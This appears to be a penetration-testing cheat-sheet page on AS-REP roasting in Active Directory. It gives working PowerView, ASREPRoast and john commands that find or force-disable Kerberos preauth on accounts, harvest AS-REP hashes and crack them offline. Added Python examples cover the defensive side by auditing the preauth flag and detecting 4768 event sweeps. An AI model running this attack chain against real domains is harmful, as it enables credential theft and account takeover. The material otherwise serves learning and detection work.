# AS-REP Roast

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FvOkGd0hf3yh6SczNiMgX%2Fimage.png?alt=media&#x26;token=c20dacdb-bfa0-47f3-8b90-b97c11378c93" alt=""><figcaption></figcaption></figure>

### Targeted Kerberoasting - AS-REPs

* If a user's UAC setting has preauthentication disabled (the DONT_REQ_PREAUTH flag), then it is possible to grab the user's crackable AS-REP (Authentication Service Response) and bruteforce it offline.
* With GenericWrite or GenericAll rights over a user object, Kerberos preauth can be force-disabled as well.

Enumerate accounts with Kerberos Preauth disabled:

{% code overflow="wrap" %}

```powershell
# PowerView
Get-DomainUser -PreauthNotRequired -Verbose

# AD module
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth
```

{% endcode %}

Using PowerView, enumerate the ACLs where RDPUsers holds interesting rights, force-disable Kerberos preauth on a user it controls, and confirm the change:

{% code overflow="wrap" %}

```powershell
# Find objects on which the RDPUsers group has interesting rights (e.g. GenericWrite/GenericAll)
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

# Toggle the DONT_REQ_PREAUTH bit (0x400000 = 4194304) in userAccountControl.
# -XOR flips the bit, so run it once; a second run re-enables preauth.
Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose

# Confirm the account now shows up as preauth-not-required
Get-DomainUser -PreauthNotRequired -Verbose
```

{% endcode %}
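The userAccountControl toggle above is easy to audit from the defensive side. The following is an added example (not from the original page or PowerView) that models the UAC bitmask, shows why `-XOR` is a toggle rather than a set, and diffs two directory snapshots to surface accounts whose DONT_REQ_PREAUTH bit changed. The flag values are the documented AD UAC bits; the account names and snapshot contents are constructed.

```python
# Added example, not from the original page: model the userAccountControl (UAC)
# bitmask so the effect of "Set-DomainObject -XOR @{useraccountcontrol=4194304}"
# can be audited from a directory export. Bit values are the documented AD UAC flags.
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "NOT_DELEGATED": 0x100000,
    "DONT_REQ_PREAUTH": 0x400000,  # decimal 4194304, the bit the page toggles
}
DONT_REQ_PREAUTH = UAC_FLAGS["DONT_REQ_PREAUTH"]


def decode_uac(value):
    """Return the names of the flags set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def xor_uac(value, bit):
    """Mirror PowerView's -XOR: the bit is toggled, not set. Applying it to an
    account that already has DONT_REQ_PREAUTH set re-enables preauth."""
    return value ^ bit


def preauth_not_required(value):
    return bool(value & DONT_REQ_PREAUTH)


# Constructed directory snapshot (sAMAccountName -> userAccountControl), not real data.
BASELINE = {
    "Control1User": 0x200,                 # normal account, preauth required
    "VPN1user": 0x200 | DONT_REQ_PREAUTH,  # preauth already disabled
    "svc_backup": 0x200 | 0x10000,         # password never expires, preauth required
}


def audit_preauth(snapshot):
    """Accounts whose AS-REP can be requested without preauth (the same set
    Get-DomainUser -PreauthNotRequired would list)."""
    return sorted(name for name, uac in snapshot.items() if preauth_not_required(uac))


def detect_preauth_changes(baseline, current):
    """Compare two snapshots and report accounts whose DONT_REQ_PREAUTH bit
    changed, which is the trace a forced disable leaves in the directory."""
    changes = []
    for name in sorted(set(baseline) | set(current)):
        before = preauth_not_required(baseline.get(name, 0))
        after = preauth_not_required(current.get(name, 0))
        if before != after:
            changes.append((name, before, after))
    return changes


if __name__ == "__main__":
    current = dict(BASELINE, Control1User=xor_uac(BASELINE["Control1User"], DONT_REQ_PREAUTH))
    print("baseline preauth disabled:", audit_preauth(BASELINE))
    print("after toggle:", audit_preauth(current))
    print("changes:", detect_preauth_changes(BASELINE, current))
```

Running a snapshot diff like this on a schedule (or comparing against event 4738, which records old and new UAC values) catches the flag flip regardless of which tool set it.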

Request the encrypted AS-REP for offline bruteforce, using the ASREPRoast module:

{% code overflow="wrap" %}

```powershell
Get-ASREPHash -UserName VPN1user -Verbose
```

{% endcode %}

To enumerate all users with Kerberos preauth disabled and request a hash:

```powershell
Invoke-ASREPRoast -Verbose
```

Finally, crack the hashes offline:

{% code overflow="wrap" %}

```powershell
john.exe --wordlist=C:\AD\Tools\kerberoast\10k-worst-pass.txt C:\AD\Tools\asrephashes.txt
```

{% endcode %}
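Every AS-REP handed out in the steps above leaves a Security event 4768 on the domain controller with PreAuthType 0, and a sweep such as `Invoke-ASREPRoast` produces a burst of them for distinct accounts from one source. The following added example (not from the original page or the ASREPRoast module) runs that detection over a constructed set of 4768 records. The field names match the event's EventData (TargetUserName, IpAddress, PreAuthType, TicketEncryptionType, Status); the sample values, the 60-second window and the three-account threshold are assumptions chosen for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Security event 4768 (a Kerberos authentication ticket
# was requested) fields, not real log data. PreAuthType 0 means the KDC issued
# the AS-REP with no pre-authentication; etype 0x17 is RC4-HMAC, 0x12 is AES256.
SAMPLE_4768 = [
    {"time": "2024-01-10T09:00:01", "TargetUserName": "jdoe", "IpAddress": "10.0.0.25",
     "PreAuthType": 2, "TicketEncryptionType": 0x12, "Status": 0x0},
    {"time": "2024-01-10T09:00:05", "TargetUserName": "VPN1user", "IpAddress": "10.0.0.77",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0x0},
    {"time": "2024-01-10T09:00:06", "TargetUserName": "Control1User", "IpAddress": "10.0.0.77",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0x0},
    {"time": "2024-01-10T09:00:07", "TargetUserName": "svc_legacy", "IpAddress": "10.0.0.77",
     "PreAuthType": 0, "TicketEncryptionType": 0x17, "Status": 0x0},
    {"time": "2024-01-10T11:30:00", "TargetUserName": "svc_legacy", "IpAddress": "10.0.0.40",
     "PreAuthType": 0, "TicketEncryptionType": 0x12, "Status": 0x0},
]

RC4_HMAC = 0x17


def parse_time(stamp):
    return datetime.fromisoformat(stamp)


def roast_candidates(events):
    """4768 events where a TGT was issued without preauth: each one handed out
    an AS-REP that can be taken offline and cracked."""
    return [e for e in events if e["PreAuthType"] == 0 and e["Status"] == 0]


def severity(event):
    """RC4-encrypted AS-REPs crack far faster than AES ones, so rank them higher."""
    return "high" if event["TicketEncryptionType"] == RC4_HMAC else "medium"


def detect_sweeps(events, window_seconds=60, min_accounts=3):
    """Sources that obtained no-preauth AS-REPs for several distinct accounts
    within a short window, the pattern an enumerate-and-roast run leaves behind.
    Window and threshold are assumed tuning values."""
    by_source = defaultdict(list)
    for e in roast_candidates(events):
        by_source[e["IpAddress"]].append((parse_time(e["time"]), e["TargetUserName"]))
    sweeps = {}
    for source, items in by_source.items():
        items.sort()
        for i, (start, _) in enumerate(items):
            in_window = {user for t, user in items[i:]
                         if t - start <= timedelta(seconds=window_seconds)}
            if len(in_window) >= min_accounts:
                sweeps.setdefault(source, set()).update(in_window)
    return sweeps


if __name__ == "__main__":
    for e in roast_candidates(SAMPLE_4768):
        print(e["time"], e["IpAddress"], e["TargetUserName"], severity(e))
    print("sweeps:", detect_sweeps(SAMPLE_4768))
```

The single 11:30 request from 10.0.0.40 is still worth a ticket, since a legitimately configured no-preauth account should be rare, but the burst from 10.0.0.77 is the high-confidence signal. Pairing this with the snapshot audit of the DONT_REQ_PREAUTH flag closes the loop: the flag flip is the precursor, the 4768 burst is the harvest.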
